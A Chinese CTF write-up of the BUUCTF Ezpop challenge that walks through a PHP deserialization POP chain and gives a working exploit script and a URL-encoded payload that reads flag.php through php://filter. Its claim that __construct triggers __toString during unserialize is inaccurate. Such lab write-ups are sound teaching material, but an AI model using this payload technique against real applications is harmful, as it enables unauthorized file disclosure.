当前位置:   article > 正文

BUUCTF [MRCTF2020]Ezpop 详解

ezpop

本题考查反序列化中的pop链(pop链即通过利用题目中其他类中的魔术方法来构造一个调用链,从而去调用目标类中能够进行命令执行或文件包含的普通方法),题目源码如下

  1. <?php
  2. //flag is in flag.php
  3. //WTF IS THIS?
  4. //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
  5. //And Crack It!
  6. class Modifier {
  7. protected $var;
  8. public function append($value){
  9. include($value);
  10. }
  11. public function __invoke(){
  12. $this->append($this->var);
  13. }
  14. }
  15. class Show{
  16. public $source;
  17. public $str;
  18. public function __construct($file='index.php'){
  19. $this->source = $file;
  20. echo 'Welcome to '.$this->source."<br>";
  21. }
  22. public function __toString(){
  23. return $this->str->source;
  24. }
  25. public function __wakeup(){
  26. if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
  27. echo "hacker";
  28. $this->source = "index.php";
  29. }
  30. }
  31. }
  32. class Test{
  33. public $p;
  34. public function __construct(){
  35. $this->p = array();
  36. }
  37. public function __get($key){
  38. $function = $this->p;
  39. return $function();
  40. }
  41. }
  42. if(isset($_GET['pop'])){
  43. @unserialize($_GET['pop']);
  44. }
  45. else{
  46. $a=new Show;
  47. highlight_file(__FILE__);
  48. }

 构造pop链要分析各个类中的魔术方法,然后找到链条的头和尾(头不唯一,尾一定是目标类)

  1. __wakeup() //执行unserialize()时,先会调用这个函数
  2. __construct() //类的构造函数,当类被创建时就会被调用
  3. __toString() //当类被当成字符串时会被调用
  4. __get() //访问一个类不存在的或者私有的属性时会被调用
  5. __invoke() //以调用函数的方式调用一个对象时被调用

在Modifier类中有一个文件包含的点,所以这个就是目标了,要执行include就要调用_invoke()魔术方法,并且用var来构造payload;要调用_invoke()就要以函数形式调用Modifier对象

  1. class Test{
  2. public $p;
  3. public function __construct(){
  4. $this->p = array();
  5. }
  6. public function __get($key){
  7. $function = $this->p;
  8. return $function();
  9. }
  10. }

 Test类中的_get()魔术方法中的发返回值$function()正好以函数的形式调用变量$function,所以让function为Modifier的对象就行,要调用_get()魔术方法就要访问Test类中不存在的属性

  1. class Show{
  2. public $source;
  3. public $str;
  4. public function __construct($file='index.php'){
  5. $this->source = $file;
  6. echo 'Welcome to '.$this->source."<br>";
  7. }
  8. public function __toString(){
  9. return $this->str->source;
  10. }
  11. public function __wakeup(){
  12. if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
  13. echo "hacker";
  14. $this->source = "index.php";
  15. }
  16. }
  17. }

 Show类中的_toString()魔术方法中有调用source属性的操作,而Test类中不存在source属性,所以这里让$str为Test的一个对象即可;要调用_toString()方法要将Show类的对象作为字符串操作,正好Show类的_construct()魔术方法中有字符串的拼接操作,将$source作为Show的对象即可。到此已经找到了pop链的头和尾,可以开始构造exp了。

  1. <?php
  2. class Modifier {
  3. protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
  4. }
  5. class Test{
  6. public $p;
  7. }
  8. class Show{
  9. public $source;
  10. public $str;
  11. }
  12. $pop = new Show();
  13. $pop->source = new Show();
  14. $pop->source->str = new Test();
  15. $pop->source->str->p = new Modifier();
  16. echo urlencode(serialize($pop));//因为$var变量被protected修饰序列化带有%00所以需要进行url编码
  17. ?>

 运行后得到的payload为:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

将payload通过GET传入后得到一段base64字符串解码后得到flag

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/936704
推荐阅读
  

闽ICP备14008679号